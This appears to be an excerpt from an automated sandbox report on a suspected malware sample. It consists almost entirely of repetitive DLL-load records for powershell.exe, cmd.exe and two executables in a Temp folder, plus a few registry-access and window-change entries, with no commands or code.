Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: acgenral.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmm.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: samcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winmmbase.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: aclayers.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: acgenral.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: msacm32.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: aclayers.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: winhttpcom.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: webio.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe | Section loaded: ondemandconnroutehelper.dll (68 identical consecutive entries collapsed into this line)
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                  Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder | Window detected: More than 3 window changes detected
